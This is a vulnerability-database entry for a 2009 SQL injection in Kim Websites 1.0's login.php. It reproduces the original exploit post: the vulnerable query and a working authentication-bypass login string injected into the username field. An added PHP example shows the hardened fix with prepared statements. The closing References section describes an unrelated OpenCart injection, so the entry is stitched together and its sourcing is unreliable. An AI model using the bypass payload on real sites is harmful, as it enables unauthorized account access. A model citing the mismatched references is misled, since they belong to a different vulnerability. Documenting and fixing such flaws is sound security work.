Kim Websites 'login.php' SQL Injection Vulnerability

Vulnerability ID: 1117469
Vulnerability type: SQL injection
Published: 2009-03-13
Updated: 2009-03-20
CVE ID: CVE-2009-1026
CNNVD-ID: CNNVD-200903-345
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/8209
https://cxsecurity.com/issue/WLB-2009030198
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-345
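|Vulnerability details
KimWebsites is a website content management system (CMS). login.php in KimWebsites version 1.0 contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via the (1) username and (2) password parameters.
|Exploit (EXP)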
###############################################################
#                                                             #
#     Kim Websites 1.0 SQL Injection Vulnerability            #
#                [ Authentication bypass]                     #
###############################################################
Virangar Security Team
www.virangar.net
--------
Discovered By : Virangar Security Team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & Aria_security team & all  hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----------------------------------
vuln code in login.php:
$username = $_POST['username'];
$password = md5($_POST['password']);
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";
 -----------------------
Exploit:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
Y0ung Ir4ni4n H4ck3rz

# milw0rm.com [2009-03-13]
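
The query quoted in the advisory builds SQL by concatenating $_POST['username'] into the statement text. A hardened form of the same login check follows as an added example; it is not Kim Websites code and not part of the advisory. Assumptions: the table columns mirror the quoted query, the "kw" prefix and sample account are constructed, an in-memory SQLite database (pdo_sqlite) stands in for MySQL so the block runs offline, date2 is stored as a Unix timestamp, and md5() is swapped for password_hash()/password_verify().

```php
<?php
// Added example, not Kim Websites code. Schema, the "kw" prefix and the
// sample account are assumptions; SQLite in memory stands in for MySQL.
declare(strict_types=1);

function open_demo_db(string $prefix): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE {$prefix}_users
               (name TEXT, password TEXT, confirm INTEGER, date2 INTEGER)");
    // Constructed sample row: confirmed account, valid for one more day.
    $ins = $db->prepare("INSERT INTO {$prefix}_users VALUES (?, ?, 1, ?)");
    $ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT), time() + 86400]);
    return $db;
}

function login(PDO $db, string $prefix, string $username, string $password): bool
{
    // A table prefix is an identifier and cannot be bound as a parameter,
    // so it is restricted to a safe character set before interpolation.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    // User input reaches the database only as bound parameters, so quotes
    // and comment markers in $username stay data and never become SQL.
    $stmt = $db->prepare(
        "SELECT password FROM {$prefix}_users
         WHERE name = :name AND confirm = 1 AND date2 > :now"
    );
    $stmt->execute([':name' => $username, ':now' => time()]);
    $hash = $stmt->fetchColumn();
    // The password is verified in PHP against a salted hash rather than
    // compared as an unsalted md5() string inside the WHERE clause.
    return is_string($hash) && password_verify($password, $hash);
}

$db = open_demo_db('kw');
var_dump(login($db, 'kw', 'admin', 'correct horse'));  // valid credentials
var_dump(login($db, 'kw', "admin ' or 1=1/*", ''));    // login string from the advisory
```

Because the statement text is fixed at prepare time, the advisory's login string is looked up as a literal user name that matches no row.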
|References

Source: XF
Name: opencart-order-sql-injection(49262)
Link: http://xforce.iss.net/xforce/xfdb/49262
Source: BID
Name: 34121
Link: http://www.securityfocus.com/bid/34121
Source: BUGTRAQ
Name: 20090316NGENUITY-2009-005OpenCartOrderByBlindSQLInjection
Link: http://www.securityfocus.com/archive/1/archive/1/501843/100/0/threaded
Source: MISC
Link: http://www.ngenuity.org/wordpress/2009/03/10/ngenuity-2009-005-opencart-order-by-blind-sql-injection/
Source: SECUNIA
Name: 34313
Link: http://secunia.com/advisories/34313